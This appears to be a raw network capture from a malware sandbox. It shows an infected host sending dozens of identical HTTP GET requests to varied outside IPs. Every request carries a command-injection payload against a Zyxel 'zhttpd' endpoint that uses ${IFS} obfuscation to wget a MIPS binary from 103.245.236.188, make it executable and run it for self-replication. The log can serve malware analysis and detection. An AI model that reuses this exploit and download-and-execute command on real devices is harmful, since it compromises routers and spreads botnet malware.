                                    Jan 13, 2024 19:02:47.480314016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7635192.168.2.135959897.62.107.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.480380058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7636192.168.2.1353140168.244.112.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.480401993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7637192.168.2.134641062.148.183.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.480449915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7638192.168.2.1342380144.227.18.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.480509043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7639192.168.2.133931885.123.242.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.480541945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7640192.168.2.1337558104.58.227.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.480592012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7641192.168.2.133371061.5.8.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.480638981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7642192.168.2.1345050161.111.79.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.480684042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7643192.168.2.134531246.43.135.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.480722904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7644192.168.2.1336492193.83.241.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.480782032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7645192.168.2.135474838.57.117.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.480838060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7646192.168.2.134468648.110.125.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.480901957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7647192.168.2.1344390197.140.130.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.480942011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7648192.168.2.1351744115.121.53.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.480990887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7649192.168.2.1340140120.42.154.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481031895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7650192.168.2.1343414101.255.0.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481098890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7651192.168.2.1333352222.88.137.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481137991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7652192.168.2.133351860.205.100.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481165886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7653192.168.2.133658852.198.65.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481224060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7654192.168.2.1341288167.85.102.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481285095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7655192.168.2.1346676163.127.124.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481317997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7656192.168.2.1357332146.192.104.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481385946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7657192.168.2.1345126180.18.235.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481419086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7658192.168.2.134272012.140.127.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481472969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7659192.168.2.135211476.105.122.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481509924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7660192.168.2.135408227.230.168.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481548071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7661192.168.2.1341430179.37.19.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481581926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7662192.168.2.135274420.212.168.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481650114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7663192.168.2.133361652.191.189.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481708050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7664192.168.2.134684835.64.127.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481739998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7665192.168.2.13533121.176.154.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481786013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7666192.168.2.1344810150.236.64.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481856108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7667192.168.2.1342844118.208.234.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481909990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7668192.168.2.133642293.77.184.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481971979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7669192.168.2.1348880124.106.186.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.481992960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7670192.168.2.1345610101.247.118.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482054949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7671192.168.2.134926844.211.127.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482079983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7672192.168.2.1347194128.250.117.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482157946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7673192.168.2.135652277.120.176.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482217073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7674192.168.2.13592721.80.23.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482248068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7675192.168.2.133920425.49.75.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482299089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7676192.168.2.1358056111.92.215.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482369900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7677192.168.2.1354262164.98.246.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482391119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7678192.168.2.134305478.54.84.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482445955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7679192.168.2.13568544.212.155.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482474089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7680192.168.2.135767466.227.89.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482512951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7681192.168.2.133463432.245.109.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482584953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7682192.168.2.134045864.4.108.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482608080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7683192.168.2.1351576123.147.150.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482695103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7684192.168.2.1346460111.69.171.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482722998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7685192.168.2.135051061.198.48.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482789040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7686192.168.2.135966639.11.40.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482816935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7687192.168.2.1359820180.3.219.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482873917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7688192.168.2.135398038.136.8.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482929945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7689192.168.2.133561084.222.65.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.482959986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7690192.168.2.1354866187.181.3.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.483016968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7691192.168.2.134831891.68.30.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.483064890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7692192.168.2.134272873.204.182.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.483138084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7693192.168.2.135370271.11.97.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.483160973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7694192.168.2.135805036.214.116.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.483181953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7695192.168.2.1343480136.35.186.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.483273029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7696192.168.2.1359472108.210.198.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.483302116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7697192.168.2.135373478.139.151.149443
                                    TimestampBytes transferredDirectionData
